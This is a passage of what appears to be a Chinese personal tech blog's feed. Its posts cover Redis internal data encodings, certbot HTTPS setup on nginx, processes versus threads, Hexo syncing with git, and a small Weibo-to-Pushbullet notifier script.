redisObject 的 ptr 指针将指向一个 sds 对象。</li><li>如果 value 是一个字符串值,且长度小于等于 32 字节,则会通过 embstr 编码保存。</li></ol><p>当 int 编码的 value 被重新赋值为字符串或通过 incr 等命令自增到超过 64 位长度时,则 Redis 会将其编码方式从 int 转换为 raw。<br>当 embstr 编码的 value 发生修改时,编码方式会变为 raw 方式,换言之,embstr 是 read only 的。</p><h3 id="list-–-gt-ziplist-linkedlist"><a href="#list-–-gt-ziplist-linkedlist" class="headerlink" title="list –> ziplist/linkedlist"></a>list –> ziplist/linkedlist</h3><p>list 的底层实现则分为 ziplist 和 linkedlist 两种。</p><ol><li>当 list 中所有元素长度都小于 <code>list-max-ziplist-value</code> 字节,且元素数量少于 <code>list-max-ziplist-entries</code> 时,底层会选择使用 ziplist。</li><li>否则,使用 linkedlist。</li></ol><p>当 ziplist 编码存储的 list 不满足上面 <code>1</code> 的两个条件任意一个时,Redis 就会将对应 value 的编码方式从 ziplist 转换为 linkedlist。</p><h3 id="hash-–-gt-ziplist-hashtable"><a href="#hash-–-gt-ziplist-hashtable" class="headerlink" title="hash –> ziplist/hashtable"></a>hash –> ziplist/hashtable</h3><p>hash 的底层实现可以为 ziplist 或者 hashtable 两种格式。</p><ol><li>当 hash 对象所有 key-value pair 长度都小于 <code>hash-max-ziplist-value</code>,且 key-value pair 数量小于 <code>hash-max-ziplist-entries</code> 时,底层会使用 ziplist 保存 hash 对象。</li><li>否则,使用 hashtable。</li></ol><p>当使用 ziplist 作为 hash 底层存储结构时,每个 key-value 对会连续地放置在 ziplist 中:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">+---------+--------+-------+------+--------+------+--------+-----+------+--------+-------+</span><br><span class="line">| zlbytes | zltail | zllen | key1 | value1 | key2 | value2 | ... | keyN | valueN | zlend | </span><br><span class="line">+---------+--------+-------+--^---+---^----+------+--------+-----+------+--------+-------+</span><br><span class="line"> | |</span><br><span class="line"> +-------+</span><br><span class="line"> key-value 对</span><br></pre></td></tr></table></figure></p><p>同 list,当 hash 对象不满足如上 <code>1</code> 的两个条件任意一个时,编码方式就会从 ziplist 转换为 hashtable。</p><h3 id="set-–-gt-intset-hashtable"><a href="#set-–-gt-intset-hashtable" class="headerlink" title="set –> intset/hashtable"></a>set –> intset/hashtable</h3><p>set 的底层实现由 intset 和 hashtable 两种。</p><ol><li>当 set 所有元素都是整数对象,且元素数量小于 <code>set-max-intset-entries</code> 时,使用 intset 作为底层编码方式。</li><li>否则,使用 hashtable。</li></ol><p>如下分别是使用 intset 和 hashtable 时,set 对象的存储方式:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line">+---------------+</span><br><span class="line">| redisObject |</span><br><span class="line">+---------------+ +-------------+</span><br><span class="line">| type | | intset |</span><br><span class="line">| REDIS_SET | +-------------+</span><br><span class="line">+---------------+ | encoding |</span><br><span class="line">| encoding | | INTSET_ENC_INT16</span><br><span class="line">| REDIS_ENCODING_INTSET +-------------+ </span><br><span class="line">+---------------+ | length |</span><br><span class="line">| ptr +-------->| 3 |</span><br><span class="line">+---------------+ +-------------+ +---+---+---+</span><br><span class="line">| ... | | contents +-->| 1 | 3 | 5 |</span><br><span class="line">+---------------+ +-------------+ +---+---+---+</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">+---------------+</span><br><span class="line">| redisObject |</span><br><span class="line">+---------------+ +-------------+</span><br><span class="line">| type | | dict |</span><br><span class="line">| REDIS_SET | +-------------+</span><br><span class="line">+---------------+ | StringObject|</span><br><span class="line">| encoding | | "haha" +-->NULL</span><br><span class="line">| REDIS_ENCODING_HT +-------------+</span><br><span class="line">+---------------+ | StringObject|</span><br><span class="line">| ptr +-------->+ "hehe" +-->NULL</span><br><span class="line">+---------------+ +-------------|</span><br><span class="line">| ... | | StringObject|</span><br><span class="line">+---------------+ | "keke" +-->NULL</span><br><span class="line"> +-------------+</span><br></pre></td></tr></table></figure></p><h3 id="zset-–-gt-ziplist-skiplist"><a href="#zset-–-gt-ziplist-skiplist" class="headerlink" title="zset –> ziplist/skiplist"></a>zset –> ziplist/skiplist</h3><p>有序集合有 ziplist 和 skiplist 两种方式作为底层的存储结构。</p><ol><li>当 zset 保存的元素小于 <code>zset-max-ziplist-entries</code> 个,且所有元素长度都小于 <code>zset-max-ziplist-value</code> 字节时,zset 底层通过 ziplist 存储。</li><li>否则,使用 skiplist 存储。</li></ol><p>同上面其他结构一样,当 <code>1</code> 条件任一不满足时,底层的数据存储结构将转换为第二种。</p><hr><h2 id="小结"><a href="#小结" class="headerlink" title="小结"></a>小结</h2><p>简单总结了下 Redis 用户端常用的数据结构,以及底层抽象的各种数据结构,以及二者是如何组合起来的。</p><p>Redis 面向用户侧的各种数据结构,并不直接实现,而是通过对象系统,在特定的条件下选择特定的底层结构,以在效率和存储空间之间平衡。</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"> +----------+ +----------+ +----------+ +----------+</span><br><span class="line"> | string | | list | | zset | | ... |</span><br><span class="line"> +----+-----+ +----+-----+ +----+-----+ +----------+</span><br><span class="line"> | | | </span><br><span class="line"> / \ | +-------------------+ </span><br><span class="line"> / | \ | | | </span><br><span class="line"> / | \ | | | </span><br><span class="line"> +-/ | \----+ +--+---+-------+ +----------------------------+ </span><br><span class="line"> | | | | | | | </span><br><span class="line">+---v-+ +v----+ +v-------+ +---v---v-+ +--v--------+ +-----------+ +--------+ +-v--------+ +-----+</span><br><span class="line">| int | | raw | | embstr | | ziplist | | linkedlist| | hashtable | | intset | | skiplist | | ... |</span><br><span class="line">+-----+ +-----+ +--------+ +----^----+ +-----------+ +---^-----^-+ +-^------+ +----------+ +-----+</span><br><span class="line"> | | | | </span><br><span class="line"> | | | | </span><br><span class="line"> | | | | </span><br><span class="line"> | +----------+ | +-+------+-+ </span><br><span class="line"> +---+ hash +-----------+ | set |</span><br><span class="line"> +----------+ +----------+</span><br></pre></td></tr></table></figure>]]></content>
<summary type="html">
<p>所有后端开发的同学,一般都会使用到 Redis 作为数据存储或缓存。在我所知的很多互联网公司,Redis 都发挥着难以替代的作用。本文试图简单介绍下,Redis 实现中用到的一些数据结构。</p>
<hr>
<h2 id="Redis-用户侧支持的数据结构"><a href
</summary>
<category term="Redis" scheme="https://xlzd.me/tags/Redis/"/>
<category term="data-structure" scheme="https://xlzd.me/tags/data-structure/"/>
</entry>
<entry>
<title>通过 Lets's Encrypt 启用 HTTPS</title>
<link href="https://xlzd.me/2018/05/12/lets-encrypt/"/>
<id>https://xlzd.me/2018/05/12/lets-encrypt/</id>
<published>2018-05-12T09:49:35.000Z</published>
<updated>2019-05-14T06:33:49.577Z</updated>
<content type="html"><![CDATA[<p>记录下通过 Lets’s Encrypt 开启 HTTPS 加成的步骤。这里以 Ubuntu16.04 + nginx 为例。我原本服务器 nginx 就已经配置好对应的域名,这里略过。</p><p>首先,安装 certbot :<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">sudo add-apt-repository ppa:certbot/certbot</span><br><span class="line">sudo apt-get update</span><br><span class="line">sudo apt-get install python-certbot-nginx</span><br></pre></td></tr></table></figure></p><p>开放 443 端口,先检查下防火墙:<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo ufw status</span><br></pre></td></tr></table></figure></p><p>如果防火墙没有打开,是这样的:<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">xlzd$ sudo ufw status</span><br><span class="line">Status: inactive</span><br></pre></td></tr></table></figure></p><p>那就什么也不管就好。如果开了,大概输出是这样:<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">Status: active</span><br><span class="line"></span><br><span class="line">To Action From</span><br><span class="line">-- ------ ----</span><br><span class="line">OpenSSH ALLOW Anywhere </span><br><span class="line">Nginx HTTP ALLOW Anywhere </span><br><span class="line">OpenSSH (v6) ALLOW Anywhere (v6)</span><br></pre></td></tr></table></figure></p><p>如果防火墙处于打开状态,执行一下:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo ufw allow 'Nginx Full'</span><br></pre></td></tr></table></figure></p><p>然后就可以生成证书了:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo certbot --nginx -d fuckthe.app -d www.fuckthe.app</span><br></pre></td></tr></table></figure></p><p>第一次执行的时候,会提示你输入一个邮箱地址。</p><p>等执行成功之后,会看到大概这样的输出:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">Please choose whether or not to redirect HTTP traffic to HTTPS, removing HTTP access.</span><br><span class="line">-------------------------------------------------------------------------------</span><br><span class="line">1: No redirect - Make no further changes to the webserver configuration.</span><br><span class="line">2: Redirect - Make all requests redirect to secure HTTPS access. Choose this for</span><br><span class="line">new sites, or if you're confident your site works on HTTPS. You can undo this</span><br><span class="line">change by editing your web server's configuration.</span><br><span class="line">-------------------------------------------------------------------------------</span><br><span class="line">Select the appropriate number [1-2] then [enter] (press 'c' to cancel): 1</span><br></pre></td></tr></table></figure></p><p>选 2 即可,会被自动写入到 nginx 配置中去。</p><p>在 crontab 中配置一下自动更新证书:<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">30 2 * * 1 /usr/bin/certbot renew --dry-run >> /var/<span class="built_in">log</span>/le-renew.log</span><br><span class="line">35 2 * * 1 /usr/bin/nginx -s reload</span><br></pre></td></tr></table></figure></p><p>下次再要加新域名的时候,只需继续执行 <code>sudo certbot --nginx -d domain.com</code> 就可以啦~</p><p>Done.</p>]]></content>
<summary type="html">
<p>记录下通过 Lets’s Encrypt 开启 HTTPS 加成的步骤。这里以 Ubuntu16.04 + nginx 为例。我原本服务器 nginx 就已经配置好对应的域名,这里略过。</p>
<p>首先,安装 certbot :<br><figure class="hi
</summary>
<category term="Linux" scheme="https://xlzd.me/tags/Linux/"/>
<category term="HTTPS" scheme="https://xlzd.me/tags/HTTPS/"/>
</entry>
<entry>
<title>关于进程与线程</title>
<link href="https://xlzd.me/2018/02/03/process-vs-thread/"/>
<id>https://xlzd.me/2018/02/03/process-vs-thread/</id>
<published>2018-02-03T14:08:22.000Z</published>
<updated>2019-05-14T06:33:49.580Z</updated>
<content type="html"><![CDATA[<p>进程(process)和线程(thread)应该是技术面试中最经常问到的知识点之一了。本文尝试简单总结下,进程与线程的一些区别。</p><p>在一开始,计算机并没有「进程」、「线程」这样的概念,计算机的功能就是输入 → 计算 → 输出。绝大部分时间里,其实计算机都是在等待用户的输入,显然这样的方式非常低效,毕竟人的手速怎么也无法跟计算机运算速度相提并论。</p><p>于是,人们开始把要执行的指令预算写到纸带、磁带或磁盘等介质上,然后将这些指令交给计算机去执行。一个专门的程序负责从对应的存储介质上读取指令序列,并交给计算机进行执行。计算机的执行过程不需要再人肉实时输入指令,少了大量等待时间,效率自然上升了很多很多。这个专门的程序,就是原始的操作系统——批处理操作系统。</p><p>批处理操作系统虽然解决了程序执行的性能问题,但是还是有一个缺点,计算机同时只能执行一个任务(程序)。如果这个程序需要大量 IO 操作,在 IO 操作发生的过程中,其实 CPU 是空闲的,要是这个空闲时间可以被利用起来,那就更好了。</p><p>为了进一步提升计算机的运算效率,「进程」就此诞生了。用进程的概念来抽象上面提到的一个任务(程序),每个程序就是一个进程,有自己独立的内存空间,程序间互不相关,操作系统负责来调度各个程序。这时 CPU 虽然还是单核的,但是操作系统通过分时的方式,把 CPU 的时间分成非常多的片段,每个片段内执行一个进程的指令,当这个时间片结束之后操作系统负责调度 CPU 执行另一个程序的指令。从 CPU 的角度来看,同一时间还是只有一个程序在执行,但是由于这里的时间片非常非常小,人的视角上,感受到的就像是多个程序在一起「同时」运行一样。</p><p>进程虽然有各自独立的内存空间,多个进程间互不相关。但是很多场景下其实需要两个程序有办法传递信息(通信),如果两个进程运行的时候如果有办法通过某种方式进行通信,会让程序的设计更加灵活方便。于是,进程间通信出现了,像管道、消息队列、信号等等,都可以实现两个进程间通信。</p><p>多进程的出现使得一个 CPU 可以「同时」执行多个不同的程序,但是在一个程序内部,指令依然是串行处理的。其实很多场景下,就算是一个程序内部,多个子任务也可以被设计为独立并行执行。为了让一个程序内部的多个子模块可以并行执行,「线程」的概念诞生了。线程是对进程内子任务的抽象,一个进程可以有多个子任务(线程)在同时执行,这些子任务会共享同一个进程的数据。<strong>「线程」的概念出现后,操作系统调度的最小单位变成了线程,而进程成为了操作系统分配资源的最小单位。</strong></p><p>多线程多进程的出现虽然让多任务并行处理的性能大大提升,但其实 CPU 角度上看本质所有的任务还是在串行执行,并不是真正的并行。直到多核 CPU 的出现,操作系统负责将不同的线程调度到多个 CPU 上执行,实现真正意义上的并行执行。</p><p>在编程开发中,其实并不是使用多线程、多进程就一定是好的,需要考虑具体的场景,根据不同业务场景选择合适的模型。比如 Redis 是单进程单线程,而 Nginx 可以使用多进程也可以使用多线程,他们却都是性能非常高的应用。</p>]]></content>
<summary type="html">
<p>进程(process)和线程(thread)应该是技术面试中最经常问到的知识点之一了。本文尝试简单总结下,进程与线程的一些区别。</p>
<p>在一开始,计算机并没有「进程」、「线程」这样的概念,计算机的功能就是输入 → 计算 → 输出。绝大部分时间里,其实计算机都是在等待
</summary>
<category term="Linux" scheme="https://xlzd.me/tags/Linux/"/>
</entry>
<entry>
<title>在多台机器间同步 Hexo 配置和数据</title>
<link href="https://xlzd.me/2017/11/30/sync-hexo/"/>
<id>https://xlzd.me/2017/11/30/sync-hexo/</id>
<published>2017-11-30T12:07:09.000Z</published>
<updated>2019-05-14T06:33:49.583Z</updated>
<content type="html"><![CDATA[<p>把博客迁移到 hexo 后,开始考虑如何同步 hexo 的配置和数据,以便在多台电脑上无痛无缝切换。</p><p>解决思路:GitHub。</p><p>如果需要定制 theme,最好将对应的 theme fork 到自己的 GitHub 中,对 theme 的修改都同步到自己 fork 的仓库中去。方便管理自己对 theme 的修改。</p><p>首先在 hexo 根目录下初始化仓库,并将 themes 中对应的 theme 通过 git submodule 管理:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">$ <span class="built_in">cd</span> xlzd.github.io</span><br><span class="line">$ git init</span><br><span class="line">$ git checkout -b hexo-source</span><br><span class="line">$ git add .</span><br><span class="line">$ git commit -m <span class="string">"init hexo source"</span></span><br><span class="line">$ git remote add origin git@github.com:xlzd/xlzd.github.io.git</span><br><span class="line">$ git submodule add git@github.com:xlzd/hexo-theme-freemind.386.git themes/freemind.386</span><br><span class="line">$ git push origin hexo-source</span><br></pre></td></tr></table></figure><hr><p>在另一台机器上:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">$ git <span class="built_in">clone</span> git@github.com:xlzd/xlzd.github.io.git</span><br><span class="line">$ <span class="built_in">cd</span> xlzd.github.io</span><br><span class="line">$ git checkout hexo-source</span><br><span class="line">$ git submodule init</span><br><span class="line">$ git submodule update</span><br><span class="line">$ npm install</span><br><span class="line">$ hexo generate && hexo server</span><br></pre></td></tr></table></figure>]]></content>
<summary type="html">
<p>把博客迁移到 hexo 后,开始考虑如何同步 hexo 的配置和数据,以便在多台电脑上无痛无缝切换。</p>
<p>解决思路:GitHub。</p>
<p>如果需要定制 theme,最好将对应的 theme fork 到自己的 GitHub 中,对 theme 的修改都同步
</summary>
<category term="hexo" scheme="https://xlzd.me/tags/hexo/"/>
</entry>
<entry>
<title>爬虫博客归档</title>
<link href="https://xlzd.me/2017/11/21/crawler-archive/"/>
<id>https://xlzd.me/2017/11/21/crawler-archive/</id>
<published>2017-11-21T14:38:50.000Z</published>
<updated>2019-05-14T06:33:49.575Z</updated>
<content type="html"><![CDATA[<p>这篇博客将之前写过的一些爬虫相关的文章整理一个列表。<br>由于上一份工作中写了大量的爬虫,顺便写了几篇入门级的爬虫相关文章,本来计划再多写点爬虫相关高难度技巧的,但是不想再碰爬虫,就作罢了。</p><p>这里将过去写过的相关文章列举如下,以后应该再也不碰爬虫相关的任何问题了(声明:由于时间原因,所以不保证文中的方法现在依然可用,也不保证其准确性,仅供参考~):</p><ul><li><a href="https://zhuanlan.zhihu.com/p/20410446" target="_blank" rel="noopener">爬虫必备——requests</a></li><li><a href="https://zhuanlan.zhihu.com/p/20413379" target="_blank" rel="noopener">Web Crawler with Python - 01. 准备</a></li><li><a href="https://zhuanlan.zhihu.com/p/20413828" target="_blank" rel="noopener">Web Crawler with Python - 02. 简单的尝试</a></li><li><a href="https://zhuanlan.zhihu.com/p/20416894" target="_blank" rel="noopener">番外篇. 搭建称手的Python开发环境</a></li><li><a href="https://zhuanlan.zhihu.com/p/20423182" target="_blank" rel="noopener">Web Crawler with Python - 03. 豆瓣电影 TOP250</a></li><li><a href="https://zhuanlan.zhihu.com/p/20430122" target="_blank" rel="noopener">Web Crawler with Python - 04. 另一种抓取方式</a></li><li><a href="https://zhuanlan.zhihu.com/p/20432575" target="_blank" rel="noopener">Web Crawler with Python - 05. 存储</a></li><li><a href="https://zhuanlan.zhihu.com/p/20435541" target="_blank" rel="noopener">Web Crawler with Python - 06. 海量数据的抓取策略</a></li><li><a href="https://zhuanlan.zhihu.com/p/20471442" target="_blank" rel="noopener">Web Crawler with Python - 07. 反爬机制<1></1></a></li><li><a href="https://zhuanlan.zhihu.com/p/20494731" target="_blank" rel="noopener">Web Crawler with Python - 08. 模拟登录</a></li><li><a href="https://zhuanlan.zhihu.com/p/20546546" target="_blank" rel="noopener">Web Crawler with Python - 09. 通过爬虫找出我和轮子哥之间的最短关注链</a></li></ul><p>从上面文中的很多地方都可以看出,我给自己挖了好多坑,准备之后再填上,不过就目前来看,我暂时并不打算填坑了~~~</p>]]></content>
<summary type="html">
<p>这篇博客将之前写过的一些爬虫相关的文章整理一个列表。<br>由于上一份工作中写了大量的爬虫,顺便写了几篇入门级的爬虫相关文章,本来计划再多写点爬虫相关高难度技巧的,但是不想再碰爬虫,就作罢了。</p>
<p>这里将过去写过的相关文章列举如下,以后应该再也不碰爬虫相关的任何问
</summary>
<category term="Python" scheme="https://xlzd.me/tags/Python/"/>
<category term="Crawler" scheme="https://xlzd.me/tags/Crawler/"/>
</entry>
<entry>
<title>hello, world.</title>
<link href="https://xlzd.me/2017/11/11/hello-world/"/>
<id>https://xlzd.me/2017/11/11/hello-world/</id>
<published>2017-11-10T17:07:00.000Z</published>
<updated>2019-05-14T06:33:49.576Z</updated>
<content type="html"><![CDATA[<p>由于一道不存在的墙,在十九大期间我的 VPS 被墙了,导致大半个月博客无法正常访问,所以干脆将博客从自己的 VPS 改回 GitHub Pages 上。毕竟已经过了折腾的年龄,还是使用简单方便的 hexo 吧~~~</p><p>之前博客写了不少,虽然质量不高,但是好歹是自己过去的总结,我会迁移少量内容到新的博客中来,但是大部分都不会转移过来了,友链中有以前博客的链接(可能无法正常访问),有兴趣的朋友还可以点进去看看~~~ </p><p>好啦,先说这些吧~~~</p><p>hello, world.</p>]]></content>
<summary type="html">
<p>由于一道不存在的墙,在十九大期间我的 VPS 被墙了,导致大半个月博客无法正常访问,所以干脆将博客从自己的 VPS 改回 GitHub Pages 上。毕竟已经过了折腾的年龄,还是使用简单方便的 hexo 吧~~~</p>
<p>之前博客写了不少,虽然质量不高,但是好歹是自
</summary>
<category term="nonsense" scheme="https://xlzd.me/tags/nonsense/"/>
</entry>
<entry>
<title>通过微博 API 和 Pushbullet 准实时关注你的心上人</title>
<link href="https://xlzd.me/2017/06/01/weibo-with-pushbullet/"/>
<id>https://xlzd.me/2017/06/01/weibo-with-pushbullet/</id>
<published>2017-05-31T17:56:56.000Z</published>
<updated>2019-05-14T06:33:49.583Z</updated>
<content type="html"><![CDATA[<p>名字取得有点标题党了,就在刚刚,闲的无聊,通过微博接口和 Pushbullet 接口做了一个近实时关注别人的小工具。<br>具体原理比较简单,就是不断轮询微博接口,发现有新的微博的时候,通过 Pushbullet 的接口推送消息到手机和电脑。</p><p><a href="https://www.pushbullet.com/" target="_blank" rel="noopener">Pushbullet</a> 是一个跨平台的消息推送工具,可以很方便将消息在各端间传递,同时也提供了 API 接口供通过程序调用。PYPI 上有一个 <a href="https://pypi.python.org/pypi/pushbullet.py" target="_blank" rel="noopener">pushbullet.py</a> 的库对它的 API 做了封建,可以更简单方便地使用,这里用到的功能比较简单:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pushbullet <span class="keyword">import</span> Pushbullet</span><br><span class="line"></span><br><span class="line">pb = Pushbullet(API_KEY)</span><br><span class="line">pb.push_note(title, body)</span><br></pre></td></tr></table></figure><p>这样可以将消息发送到 API_KEY 对应帐号登录的所有设备,API_KEY 通过登录后如下截图中页面的「Create Access Token」创建。</p><p><img src="http://7xkpi6.com1.z0.glb.clouddn.com/blog/2017/06/01/create-access-token.jpg" alt="create-access-token"></p><a id="more"></a><p>而关注别人发送新微博则可以通过微博的 <a href="http://open.weibo.com/wiki/%E5%BE%AE%E5%8D%9AAPI" target="_blank" rel="noopener">API 接口</a>。很久很久以前为了做一个微博报时机器人曾经申请过一个微博应用,这里刚好用上了。如果你没有应用,创建一个就好啦。</p><p><img src="http://7xkpi6.com1.z0.glb.clouddn.com/blog/2017/06/01/weibo.jpg" alt="create-access-token"></p><p><a href="https://pypi.python.org/pypi/weibo" target="_blank" rel="noopener">weibo</a> 是一个对微博接口的封装库,大概使用如下:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> weibo <span class="keyword">import</span> Client</span><br><span class="line"></span><br><span class="line">APP_KEY = <span class="string">'*****'</span></span><br><span class="line">APP_SECRET = <span class="string">'******'</span></span><br><span class="line">CALLBACK_URL = <span class="string">'https://api.weibo.com/oauth2/default.html'</span></span><br><span class="line">AUTH_URL = <span class="string">'https://api.weibo.com/oauth2/authorize'</span></span><br><span class="line">USERID = <span class="string">'******'</span></span><br><span class="line">PASSWD = <span class="string">'*******'</span></span><br><span class="line"></span><br><span class="line">client = Client(APP_KEY, APP_SECRET, CALLBACK_URL, username=USERID, password=PASSWD)</span><br><span class="line">data = client.get(<span class="string">'API_PATH'</span>)</span><br></pre></td></tr></table></figure><p><img src="http://7xkpi6.com1.z0.glb.clouddn.com/blog/2017/06/01/weibo2.jpg" alt="create-access-token"></p><p>由于微博接口限制,无法再直接获取到非授权用户的微博列表,由于我刚好微博并没有关注任何人,所以关注需要关注动态的人后,获取自己的微博列表拿到的刚好就是这个人时间序排列的前几条微博。说到这里刚好还能给微博提一个 bug,大概是由于缓存不同步吧,我明明已经删除了所有的微博(只剩一条)和取关了所有人,个人主页上显示的数字不正确:<br><img src="http://7xkpi6.com1.z0.glb.clouddn.com/blog/2017/06/01/weibo2.jpg" alt="create-access-token"></p><p>如果你关注了很多人,一个解决方案是在获取自己微博列表的时候通过 <a href="http://open.weibo.com/wiki/2/statuses/user_timeline" target="_blank" rel="noopener">user_timeline 接口</a>的 since_id 和 count 字段多获取一点,每次获取都记录下上次的最后一条的位置,下次从最新数据取到上次取过的地方为止,然后 filter 过滤掉其它人的微博。<br>接下来的事情,就是写一个 crontab,隔段时间读一次微博列表,判断如果有新的微博,就通过 Pushbullet 的接口推消息给自己。这个接口返回的数据还有微博 po 主的个人资料,所以顺便还能监测目标用户微博资料的变更。</p><p>这里 crontab 的间隔时间,根据微博接口<a href="http://open.weibo.com/wiki/%E6%8E%A5%E5%8F%A3%E8%AE%BF%E9%97%AE%E9%A2%91%E6%AC%A1%E6%9D%83%E9%99%90-" target="_blank" rel="noopener">访问频次权限</a>,设置为每分钟一次是没问题的~</p><p>最后的效果是这样的:</p><p><img src="http://7xkpi6.com1.z0.glb.clouddn.com/blog/2017/06/01/result.jpg" alt="create-access-token"><br><img src="http://7xkpi6.com1.z0.glb.clouddn.com/blog/2017/06/01/result2.jpg" alt="create-access-token"></p><p>有点晚了,写的比较马虎,完整的代码在这里:<a href="https://gist.github.com/xlzd/01b8b8e1909ae0f601c85e142f2bd15b" target="_blank" rel="noopener">weibo monitor - Github Gist</a>,仅供参考。</p>]]></content>
<summary type="html">
<p>名字取得有点标题党了,就在刚刚,闲的无聊,通过微博接口和 Pushbullet 接口做了一个近实时关注别人的小工具。<br>具体原理比较简单,就是不断轮询微博接口,发现有新的微博的时候,通过 Pushbullet 的接口推送消息到手机和电脑。</p>
<p><a href="https://www.pushbullet.com/" target="_blank" rel="noopener">Pushbullet</a> 是一个跨平台的消息推送工具,可以很方便将消息在各端间传递,同时也提供了 API 接口供通过程序调用。PYPI 上有一个 <a href="https://pypi.python.org/pypi/pushbullet.py" target="_blank" rel="noopener">pushbullet.py</a> 的库对它的 API 做了封建,可以更简单方便地使用,这里用到的功能比较简单:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pushbullet <span class="keyword">import</span> Pushbullet</span><br><span class="line"></span><br><span class="line">pb = Pushbullet(API_KEY)</span><br><span class="line">pb.push_note(title, body)</span><br></pre></td></tr></table></figure>
<p>这样可以将消息发送到 API_KEY 对应帐号登录的所有设备,API_KEY 通过登录后如下截图中页面的「Create Access Token」创建。</p>
<p><img src="http://7xkpi6.com1.z0.glb.clouddn.com/blog/2017/06/01/create-access-token.jpg" alt="create-access-token"></p>
</summary>
<category term="Python" scheme="https://xlzd.me/tags/Python/"/>
</entry>
<entry>
<title>img2html: 将图片转换成 HTML 页面</title>
<link href="https://xlzd.me/2017/04/02/img2html/"/>
<id>https://xlzd.me/2017/04/02/img2html/</id>
<published>2017-04-02T14:22:14.000Z</published>
<updated>2019-05-14T06:33:49.576Z</updated>
<content type="html"><![CDATA[<p>闲得无聊,写了个程序,将一张图片转换成一个 HTML 页面。<br>如图,左边是原图,右边是一个 HTML 页面,根据文字颜色不同拼出了左边的图片:</p><table><thead><tr><th style="text-align:center">原始图片</th><th style="text-align:center">转换后</th></tr></thead><tbody><tr><td style="text-align:center"><img src="https://raw.githubusercontent.com/xlzd/img2html/master/demo/before.png" alt></td><td style="text-align:center"><img src="https://raw.githubusercontent.com/xlzd/img2html/master/demo/after.png" alt></td></tr></tbody></table><p>(注意:右图可不是图片,而是一个 <a href="http://old-blog.xlzd.me/hide/img2html/" target="_blank" rel="noopener">HTML 页面</a>)</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"> ___ __ __ ___</span><br><span class="line"> __ /'___`\ /\ \ /\ \__ /\_ \</span><br><span class="line">/\_\ ___ ___ __ /\_\ /\ \ \ \ \___ \ \ ,_\ ___ ___ \//\ \</span><br><span class="line">\/\ \ /' __` __`\ /'_ `\ \/_/// /__ \ \ _ `\ \ \ \/ /' __` __`\ \ \ \</span><br><span class="line"> \ \ \ /\ \/\ \/\ \ /\ \L\ \ // /_\ 